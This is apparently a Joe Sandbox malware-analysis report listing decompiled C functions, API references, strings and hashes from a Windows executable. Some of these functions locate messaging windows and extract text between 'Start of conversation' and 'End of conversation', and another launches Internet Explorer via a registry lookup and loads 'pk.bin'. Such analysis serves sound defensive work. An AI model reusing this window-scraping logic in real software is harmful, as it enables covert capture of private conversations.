Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537$#2818#540Format$#1168#535#6673BuffCharDateH_prologLoadStringTimeUpper
String ID: %s, %s$<H2>%s %s</H2><H3>%s</H3><P><A target=_blank href="%s" title="%s">%s</A></P>$K0D
API String ID: 233094147-310780555
Opcode ID: 6a82cd9536980773b2d7847f9c8f5e9db139ad7c6efe8067013acb1c0a22f0fc
Instruction ID: f8bb55adfb7051356685040e1f82e5c9bf6c764db956d224435fdf9f315a5327
Opcode Fuzzy Hash: 6a82cd9536980773b2d7847f9c8f5e9db139ad7c6efe8067013acb1c0a22f0fc
Instruction Fuzzy Hash: 4A4161B2C0014DEBDF01DFA5C941AEEBB78EF19318F14845EE515A7282D7789B08CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA94, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040AA94(void* __eflags) {
				struct HWND__* _t35;
				struct HWND__* _t36;
				struct HWND__* _t39;
				CHAR* _t58;
				void* _t64;

				E0043E4E0(0x43fb6f, _t64);
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				if(E0040FF68( *((intOrPtr*)(_t64 + 0xc)), 0, "TPanel", 0, "TPageControlEx", 0) != 0) {
					_t58 = "TTabSheet";
					_t35 = E0040FF68(_t34, 0, "TPageControlEx", 0, _t58, 0);
					 *(_t64 - 0x1c) = _t35;
					if(_t35 != 0) {
						L0043DDD8();
						 *((intOrPtr*)(_t64 - 4)) = 1;
						 *(_t64 - 0x10) = 0;
						while(1) {
							_t36 = FindWindowExA( *(_t64 - 0x1c),  *(_t64 - 0x10), _t58, 0);
							 *(_t64 - 0x10) = _t36;
							if(_t36 == 0) {
								break;
							}
							L0043DDD8();
							 *((char*)(_t64 - 4)) = 2;
							_t39 = FindWindowExA( *(_t64 - 0x10), 0, "TRichView", 0);
							 *(_t64 - 0x20) = _t39;
							if(IsWindowVisible(_t39) != 0) {
								_push( *(_t64 - 0x20));
								_push( *((intOrPtr*)(_t64 + 8)));
								E0040FEA7();
								 *((intOrPtr*)(_t64 - 0x18)) = 1;
								 *((char*)(_t64 - 4)) = 1;
								L0043DD36();
							} else {
								 *((char*)(_t64 - 4)) = 1;
								L0043DD36();
								continue;
							}
							L10:
							 *((char*)(_t64 - 4)) = 0;
							L0043DD36();
							goto L11;
						}
						_push(_t64 + 0xc);
						L0043DD3C();
						 *((intOrPtr*)(_t64 - 0x18)) = 1;
						goto L10;
					} else {
						_push(0x4550cc);
						L0043DE26();
					}
				} else {
					_push(0x4550cc);
					L0043DE26();
				}
				L11:
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return  *((intOrPtr*)(_t64 + 8));
			}

0x0040aa99
0x0040aab7
0x0040aac4
0x0040aad8
0x0040aae3
0x0040aaed
0x0040aaf0
0x0040ab07
0x0040ab12
0x0040ab19
0x0040ab1c
0x0040ab24
0x0040ab28
0x0040ab2b
0x00000000
0x00000000
0x0040ab30
0x0040ab3c
0x0040ab43
0x0040ab46
0x0040ab51
0x0040ab67
0x0040ab6a
0x0040ab6d
0x0040ab73
0x0040ab7b
0x0040ab82
0x0040ab53
0x0040ab5c
0x0040ab60
0x00000000
0x0040ab60
0x0040ab9c
0x0040ab9f
0x0040aba2
0x00000000
0x0040aba2
0x0040ab8f
0x0040ab90
0x0040ab95
0x00000000
0x0040aaf2
0x0040aaf5
0x0040aafa
0x0040aafa
0x0040aac6
0x0040aac9
0x0040aace
0x0040aace
0x0040aba7
0x0040abb0
0x0040abb8

APIs

__EH_prolog.LIBCMT ref: 0040AA99

Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90

#537.MFC42(004550CC), ref: 0040AACE
#537.MFC42(004550CC), ref: 0040AAFA

Strings

TPanel, xrefs: 0040AAAE
TPageControlEx, xrefs: 0040AAA6, 0040AAAC, 0040AAE0
TRichView, xrefs: 0040AB36
TTabSheet, xrefs: 0040AAD8, 0040AADE, 0040AB1D

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537FindWindow$H_prolog
String ID: TPageControlEx$TPanel$TRichView$TTabSheet
API String ID: 2495091285-762916412
Opcode ID: 5703e4aa9909e3188e7c7995e9d98b60ae9bde4a09170edef4a87def2a394ea7
Instruction ID: 7daf1b419306ae0afb1a7ec3c3defd097d2df8c4cddd0e586c7c6b1396e9f578
Opcode Fuzzy Hash: 5703e4aa9909e3188e7c7995e9d98b60ae9bde4a09170edef4a87def2a394ea7
Instruction Fuzzy Hash: 093153B0D00209AACF10EFA5DC81AEEBB78EF19359F10442FF405A6281D77C5E44C769

Uniqueness

Uniqueness Score: -1.00%

Function 00426AFE, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 92
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00426AFE(void* __ecx) {
				long _t35;
				long _t47;
				intOrPtr* _t49;
				void* _t60;
				void* _t62;

				E0043E4E0(0x442c08, _t62);
				_t60 = __ecx;
				if(RegOpenKeyA(0x80000000, "CLSID\\{0002DF01-0000-0000-C000-000000000046}\\LocalServer32", _t62 - 0x10) == 0) {
					 *(_t62 - 0x14) = 0x104;
					_t35 = RegQueryValueA( *(_t62 - 0x10), 0, _t62 - 0x174, _t62 - 0x14);
					_push( *(_t62 - 0x10));
					__eflags = _t35;
					if(_t35 == 0) {
						RegCloseKey();
						lstrcpyA(_t62 - 0x37c, _t62 - 0x174);
						lstrcatA(_t62 - 0x37c, " about:blank");
						memset(_t62 - 0x70, 0, 0x44);
						 *(_t62 - 0x70) = 0x44;
						 *((short*)(_t62 - 0x40)) = 0;
						 *((intOrPtr*)(_t62 - 0x44)) = 1;
						_t47 = CreateProcessA(0, _t62 - 0x37c, 0, 0, 0, 0, 0, 0, _t62 - 0x70, _t62 - 0x2c);
						__eflags = _t47;
						if(__eflags != 0) {
							 *((char*)(_t60 + 0x1a19)) = 1;
							 *((intOrPtr*)(_t60 + 0x2734)) =  *((intOrPtr*)(_t62 - 0x24));
							_t49 = _t62 - 0x1c;
							_push(_t49);
							L0043E162();
							_push("pk.bin");
							 *((intOrPtr*)(_t60 + 0x17d8)) =  *_t49;
							_push(0x4558c8);
							_push(_t62 - 0x18);
							L0043DE20();
							 *(_t62 - 4) = 0;
							_t47 = E0040BC5C(_t60 + 0x16b8, __eflags,  *((intOrPtr*)(_t62 - 0x18)));
							_t25 = _t62 - 4;
							 *_t25 =  *(_t62 - 4) | 0xffffffff;
							__eflags =  *_t25;
							L0043DD36();
						} else {
							goto L5;
						}
					} else {
						_t47 = RegCloseKey();
						L5:
						 *0x4558e8 = 0;
					}
				} else {
					 *0x4558e8 =  *0x4558e8 & 0x00000000;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t47;
			}

0x00426b03
0x00426b19
0x00426b28
0x00426b47
0x00426b4e
0x00426b54
0x00426b57
0x00426b59
0x00426b63
0x00426b77
0x00426b89
0x00426b96
0x00426ba1
0x00426ba8
0x00426bbf
0x00426bc6
0x00426bcc
0x00426bce
0x00426bdb
0x00426be2
0x00426be8
0x00426beb
0x00426bec
0x00426bf3
0x00426bf8
0x00426c01
0x00426c06
0x00426c07
0x00426c14
0x00426c17
0x00426c1c
0x00426c1c
0x00426c1c
0x00426c23
0x00000000
0x00000000
0x00000000
0x00426b5b
0x00426b5b
0x00426bd0
0x00426bd0
0x00426bd0
0x00426b2a
0x00426b2a
0x00426b2a
0x00426c2d
0x00426c35

APIs

__EH_prolog.LIBCMT ref: 00426B03
RegOpenKeyA.ADVAPI32(80000000,CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32,?), ref: 00426B20
RegQueryValueA.ADVAPI32(?,00000000,?,?), ref: 00426B4E
RegCloseKey.ADVAPI32(?), ref: 00426B5B

Strings

about:blank, xrefs: 00426B83
D, xrefs: 00426BA1
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32, xrefs: 00426B14
pk.bin, xrefs: 00426BF3

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CloseH_prologOpenQueryValue
String ID: about:blank$CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32$D$pk.bin
API String ID: 1233982722-1282806162
Opcode ID: 525be468897c903c59db88c317424d1505ba80cf9d1b3849818ab8045eea079e
Instruction ID: 716bd6f49e76ca3325759ad5cd35cb476e0685c08d7650bbd61416e5c304f96a
Opcode Fuzzy Hash: 525be468897c903c59db88c317424d1505ba80cf9d1b3849818ab8045eea079e
Instruction Fuzzy Hash: 59318DB1900618ABDB20DFA1DC49BEFBBBCFB89305F10002AE515E2150E7795A48CF28

Uniqueness

Uniqueness Score: -1.00%

Function 0040A012, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040A012(intOrPtr __ecx) {
				void* _t35;
				void* _t38;
				intOrPtr _t59;
				void* _t61;
				void* _t62;

				E0043E4E0(0x43f9c0, _t62);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t62 - 0x14)) = 0;
				if( *((intOrPtr*)(__ecx + 0xc)) == 0 ||  *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_push(0x4550cc);
					L0043DE26();
				} else {
					_t35 = E0040A178(_t59, _t62 + 0xc, FindWindowExA( *(_t62 + 0xc), 0, "DirectUIHWND", 0));
					_push(" End of conversation");
					 *(_t62 - 4) = 0;
					L0043DFD6();
					_push("Start of conversation");
					_t61 = _t35;
					L0043DFD6();
					if(_t61 != 0xffffffff) {
						_push(_t35 + 0x16);
						_push(_t62 - 0x10);
						L0043DFB2();
						_t38 = _t62 - 0x14;
						_push(_t61);
						_push(_t38);
						 *(_t62 - 4) = 1;
						L0043DFD0();
						_push(_t38);
						 *(_t62 - 4) = 2;
						L0043DE1A();
						 *(_t62 - 4) = 1;
						L0043DD36();
						_push(_t62 - 0x10);
						L0043DD3C();
						 *(_t62 - 4) = 0;
						L0043DD36();
					} else {
						_push(_t62 + 0xc);
						L0043DD3C();
					}
					 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return  *((intOrPtr*)(_t62 + 8));
			}

0x0040a017
0x0040a01c
0x0040a01d
0x0040a020
0x0040a024
0x0040a02a
0x0040a0e9
0x0040a0ee
0x0040a039
0x0040a050
0x0040a055
0x0040a05d
0x0040a060
0x0040a065
0x0040a06d
0x0040a06f
0x0040a077
0x0040a08d
0x0040a091
0x0040a092
0x0040a097
0x0040a09a
0x0040a09b
0x0040a09f
0x0040a0a3
0x0040a0a8
0x0040a0ac
0x0040a0b0
0x0040a0b8
0x0040a0bc
0x0040a0c7
0x0040a0c8
0x0040a0d0
0x0040a0d3
0x0040a079
0x0040a07f
0x0040a080
0x0040a080
0x0040a0d8
0x0040a0df
0x0040a0df
0x0040a0fb
0x0040a103

APIs

__EH_prolog.LIBCMT ref: 0040A017
FindWindowExA.USER32 ref: 0040A043

Part of subcall function 0040A178: __EH_prolog.LIBCMT ref: 0040A17D
Part of subcall function 0040A178: #537.MFC42(004550CC,?,?,00000000), ref: 0040A1CC
Part of subcall function 0040A178: #537.MFC42(004550CC,?,?,00000000), ref: 0040A1EC
Part of subcall function 0040A178: #800.MFC42(004550CC,?,?,00000000), ref: 0040A34A

#2764.MFC42( End of conversation,?,00000000), ref: 0040A060
#2764.MFC42(Start of conversation, End of conversation,?,00000000), ref: 0040A06F
#535.MFC42(?,Start of conversation, End of conversation,?,00000000), ref: 0040A080
#4277.MFC42(?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A092
#4129.MFC42(?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0A3
#939.MFC42(00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0B0
#800.MFC42(00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0BC
#535.MFC42(?,00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0C8
#800.MFC42(?,00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0D3
#800.MFC42(?,00000000,?,00000000,?,-00000016,Start of conversation, End of conversation,?,00000000), ref: 0040A0DF
#537.MFC42(004550CC), ref: 0040A0EE

Strings

DirectUIHWND, xrefs: 0040A03A
End of conversation, xrefs: 0040A055
Start of conversation, xrefs: 0040A065

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537$#2764#535H_prolog$#4129#4277#939FindWindow
String ID: End of conversation$DirectUIHWND$Start of conversation
API String ID: 1627553073-1357077119
Opcode ID: 023599eb2e0bd5fe7af2846cf7c612bb523f2f85926112e2c3288da98f08f03d
Instruction ID: 1e1602f22ff40642f5431aac3e1f74c10c0d3f201623bf239baed196fa13c1a4
Opcode Fuzzy Hash: 023599eb2e0bd5fe7af2846cf7c612bb523f2f85926112e2c3288da98f08f03d
Instruction Fuzzy Hash: 03215271900208FBCB14EFA5D881AEEB768AF18358F10951FF82667181DB789B08C765

Uniqueness

Uniqueness Score: -1.00%

Function 004196F5, Relevance: 28.0, APIs: 6, Strings: 10, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004196F5(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x004196f5
0x004196ff
0x00419704
0x0041970e
0x00419713
0x0041971d
0x00419722
0x0041972c
0x00419731
0x0041973b
0x00419740
0x0041974a
0x0041974f

APIs

#537.MFC42(None,004196F0), ref: 004196FF
#537.MFC42(User defined,None,004196F0), ref: 0041970E
#537.MFC42(Open,User defined,None,004196F0), ref: 0041971D
#537.MFC42(Print,Open,User defined,None,004196F0), ref: 0041972C
#537.MFC42(Explore,Print,Open,User defined,None,004196F0), ref: 0041973B
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,004196F0), ref: 0041974A

Strings

Open, xrefs: 00419713
TE, xrefs: 00419718
E-mail, xrefs: 00419740
(TE, xrefs: 00419736
,TE, xrefs: 00419745
$TE, xrefs: 00419727
Explore, xrefs: 00419731
Print, xrefs: 00419722
User defined, xrefs: 00419704
None, xrefs: 004196F5

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: TE$$TE$(TE$,TE$E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-134244681
Opcode ID: 66357b02ccce549f61fb2f24690c4701eddd7a7f3a63d581e5c14dd0e385a72d
Instruction ID: 0cbec859e043791c651e77f1f34d7abc853e4eae3fc06a0a1311bf9740f4d484
Opcode Fuzzy Hash: 66357b02ccce549f61fb2f24690c4701eddd7a7f3a63d581e5c14dd0e385a72d
Instruction Fuzzy Hash: 04D0AC00F50E505149187E65F83373D5842C7DD7CBB50A16F7D121E1D38D4C4A5C452D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F818, Relevance: 27.1, APIs: 18, Instructions: 109
windowlibraryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0041F818(void* __ecx, void* __edx) {
				int _t38;
				long _t41;
				intOrPtr _t47;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				int _t57;
				intOrPtr* _t70;
				void* _t73;
				void* _t75;
				void* _t77;
				void* _t78;

				E0043E4E0(0x441da4, _t75);
				_t78 = _t77 - 0xc;
				_t73 = __ecx;
				L0043DDD8();
				 *(_t75 - 4) = 0;
				L0043DDD8();
				 *(_t75 - 4) = 1;
				SendMessageA( *( *((intOrPtr*)(__ecx + 0x98)) + 0x20), 0x1009, 0, 0);
				_t70 = ImageList_GetImageCount;
				_t38 = ImageList_GetImageCount( *(_t73 + 0x94));
				if(_t38 <= 0) {
					L3:
					E0041FAB9(0x4554a0, 0, 0xffffffff);
					_t13 = _t75 - 0x14; // 0x419
					_push(0x42d);
					L0043E2E2();
					_t41 = LoadLibraryA( *(_t75 - 0x14));
					_t54 = _t41;
					if(_t54 == 0) {
						L8:
						 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
						L0043DD36();
						 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
						L0043DD36();
						 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
						return _t41;
					}
					EnumResourceNamesA(_t54, 0xe, E0041F501, _t73 + 0x90);
					FreeLibrary(_t54);
					_push( *(_t73 + 0x94));
					_t56 = 0;
					if( *_t70() <= 0) {
						L6:
						_t41 = SendMessageA( *( *((intOrPtr*)(_t73 + 0x98)) + 0x20), 0x1004, 0, 0);
						if(_t41 != 0) {
							_push(3);
							_push(3);
							_push(0);
							L0043E3BA();
						}
						goto L8;
					} else {
						goto L5;
					}
					do {
						L5:
						_t17 = _t56 + 1; // 0x1
						_t47 = _t17;
						 *((intOrPtr*)(_t75 - 0x18)) = _t47;
						_t19 = _t75 - 0x10; // 0x41d
						L0043E174();
						_t78 = _t78 + 0xc;
						L0043DF88();
						_t56 =  *((intOrPtr*)(_t75 - 0x18));
						 *_t70( *(_t73 + 0x94), 3, _t56,  *((intOrPtr*)(_t75 - 0x10)), 0, 0, _t56, 0, _t19, 0x4532c8, _t47);
					} while (_t56 < 0);
					goto L6;
				}
				_t8 = _t38 - 1; // -1
				_t57 = _t8;
				 *((intOrPtr*)(_t75 - 0x18)) = _t38;
				do {
					ImageList_Remove( *(_t73 + 0x94), _t57);
					_t57 = _t57 - 1;
					_t11 = _t75 - 0x18;
					 *_t11 =  *((intOrPtr*)(_t75 - 0x18)) - 1;
				} while ( *_t11 != 0);
				goto L3;
			}

0x0041f81d
0x0041f822
0x0041f827
0x0041f82d
0x0041f837
0x0041f83a
0x0041f84f
0x0041f853
0x0041f85f
0x0041f865
0x0041f869
0x0041f884
0x0041f88d
0x0041f892
0x0041f898
0x0041f89d
0x0041f8a5
0x0041f8ab
0x0041f8af
0x0041f94a
0x0041f94a
0x0041f951
0x0041f956
0x0041f95d
0x0041f968
0x0041f970
0x0041f970
0x0041f8c4
0x0041f8cb
0x0041f8d1
0x0041f8d7
0x0041f8dd
0x0041f91d
0x0041f92f
0x0041f937
0x0041f93f
0x0041f941
0x0041f943
0x0041f945
0x0041f945
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f8df
0x0041f8df
0x0041f8df
0x0041f8df
0x0041f8e2
0x0041f8e6
0x0041f8ef
0x0041f8f4
0x0041f909
0x0041f914
0x0041f917
0x0041f919
0x00000000
0x0041f8df
0x0041f86b
0x0041f86b
0x0041f86e
0x0041f871
0x0041f878
0x0041f87e
0x0041f87f
0x0041f87f
0x0041f87f
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0041F81D
#540.MFC42(7741B980,?,?), ref: 0041F82D
#540.MFC42(7741B980,?,?), ref: 0041F83A
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0041F853
ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F865
ImageList_Remove.COMCTL32(?,-00000001,?,?), ref: 0041F878
#3097.MFC42(0000042D,00000419,?,?), ref: 0041F89D
LoadLibraryA.KERNEL32(?,0000042D,00000419,?,?), ref: 0041F8A5
EnumResourceNamesA.KERNEL32 ref: 0041F8C4
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041F8CB
ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F8D9
#2818.MFC42(0000041D,004532C8,00000001,?,?), ref: 0041F8EF
#3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F909
ImageList_GetImageCount.COMCTL32(?,00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F917
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F92F
#6905.MFC42(00000000,00000003,00000003,?,?), ref: 0041F945
#800.MFC42(?,?), ref: 0041F951
#800.MFC42(?,?), ref: 0041F95D

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Image$List_$Count$#540#800LibraryMessageSend$#2818#3097#3998#6905EnumFreeH_prologLoadNamesRemoveResource
String ID:
API String ID: 645711819-0
Opcode ID: 89d81a815a518c5910fccd5ed1f3c1e0cf7e1cd9a2264864083e33c37371d238
Instruction ID: 553764608f11a75eef87a8837ecdba7271e4b71b3464afb6f8dfa76467da2288
